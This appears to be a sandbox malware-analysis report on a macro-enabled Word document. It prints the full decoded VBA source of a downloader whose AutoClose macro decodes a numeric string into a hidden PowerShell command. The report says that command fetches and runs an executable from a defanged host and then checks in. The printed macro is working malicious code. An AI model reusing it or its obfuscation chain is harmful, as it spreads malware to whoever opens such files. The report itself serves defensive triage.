Verdict: MALICIOUS (risk score 244)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 User Execution: Malicious File
ClamAV identifies the sample as malicious with the signature Doc.Malware.Emooodldr-6711604-0. The document carries a VBA project whose ThisDocument module defines an AutoClose macro (Word's document-close auto macro, which the heuristic reports under the Excel-style name Auto_Close), so the chain fires when the user closes the document rather than when it is opened; a sandbox that opens the file and never closes it will not observe execution. AutoClose invokes tentacolo() through Application.Run, and tentacolo() hands its argument to Shell() with window style 0 (hidden). That argument is not truncated: it is a long all-decimal literal that estonia() consumes two digits at a time (uncinetto() uses the StrConv/Split trick to break the string into single characters), and riciclato() maps each two-digit pair to one entry of a 52-character substitution alphabet (peccato). Decoded, it is a cmd.exe /c powershell -Exec Bypass -NoP -Command line that uses System.Net.WebClient.DownloadFile to fetch hxxp://okjeintmotorsy[.]com/nino/mariog.mdf into %APPDATA%\QytFAJ.exe, launches it with Start-Process, and then issues two further WebClient.DownloadString requests to the same host, the last to hxxp://okjeintmotorsy[.]com/s.php?id=mariog, which reads as an install check-in. No client-side vulnerability is exploited; execution depends on the user enabling macros and then closing the document.
Heuristics (6)
- ClamAV: Doc.Malware.Emooodldr-6711604-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0.
- VBA project inside OOXML [medium, OOXML_VBA, 2 related findings]: the document contains a VBA project (VBA macros present).
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA.
- Auto_Close macro [high, OLE_VBA_AUTOCLOSE]: Auto_Close macro (the module defines Word's AutoClose auto macro, which runs when the document is closed).
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: one or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All six URLs below were found in document text (OOXML body / shared strings):
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2006/wordml
  These are XML namespace identifiers present in every Word OOXML package; they are not network indicators and carry no weight in the verdict. The download and check-in URLs that matter for this sample exist only inside the numeric string in the macro and are invisible to a plain URL scan.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2273 bytes | 8b2d1d1c707186efeaa5b5dc57db1fc64fb20ffc3fa03d08ff31cefb77f1f1ac |

Detection (macros.bas): ClamAV: no threats found. Obfuscation or payload: likely (the carved artifact contains 1 long base64-like blob). The blob is the all-decimal argument to estonia(); it falls inside the base64 character class, which is what the heuristic keys on, but it is a string of two-digit substitution indices, not base64, and a base64 decoder yields nothing useful from it.
Preview (first 1,000 lines of the extracted script, shown verbatim):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function riciclato(piattino As Integer) As String
Dim peccato() As Variant
peccato = Array("k", "d", ".", "A", "C", "a", "l", "W", "t", "o", "j", "S", ")", "/", "h", "p", "\", "y", "g", "v", "r", "J", ":", "f", "P", "i", "m", "=", "O", "-", "B", "w", "c", "s", ",", "N", " ", "E", "F", "?", "Q", "D", "n", "+", "'", "T", "b", "$", "(", ";", "x", "e")
Dim satellite As Integer
For satellite = LBound(peccato) To UBound(peccato)
If satellite = piattino Then
riciclato = peccato(satellite)
End If
Next
End Function
Function uncinetto(brodo As String)
brodo = StrConv(brodo, vbUnicode)
uncinetto = Split(Left(brodo, Len(brodo) - 1), vbNullChar)
End Function
Function estonia(ampliare As String) As String
Dim inter As Integer
Dim passivo As String
Dim eclissi As Variant
eclissi = uncinetto(Trim(ampliare))
For satellite = 0 To Len(ampliare)
If (satellite + 1) <= UBound(eclissi) Then
Dim ambrato As String
ambrato = eclissi(satellite)
satellite = satellite + 1
ambrato = ambrato + eclissi(satellite)
passivo = passivo + riciclato(Int(ambrato))
End If
Next
estonia = passivo
End Function
Public Function tentacolo(satellite As String)
Shell satellite, 0
End Function
Sub AutoClose()
Call Application.Run("tentacolo", estonia("32260102515051361332361509315120331451060636293750513236301715053333362935092436290409262605420136483551312928461051320836111733085126023551080207514604062551420812024109314206090501382506514844140808152213130900105125420826090809203317023209261342254209132605202509180226012344343647514219220324244103450336433644164017083803210251505144124936110805200829242009325133333647514219220324244103450344164017083803210251505144493648355131292846105132083611173308512602355108020751460406255142081202410931420609050111082025421848441408081522131309001051254208260908092033170232092613330215141539250127260520250918441249"))
End Sub
```
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes | 6864495207ef77277ea89eb561a4719fc8503fe39dbc3e51703fc9dce91eb3fc |

Detection (vbaProject_00.bin): ClamAV: Doc.Malware.Emooodldr-6711604-0. Obfuscation or payload: likely (the carved artifact contains 1 long base64-like blob). This is the compiled VBA project from which macros.bas was decoded, and it is the artifact the ClamAV signature actually fires on; the decoded source alone is not matched, so a scanner that only sees extracted macro text would miss this signature.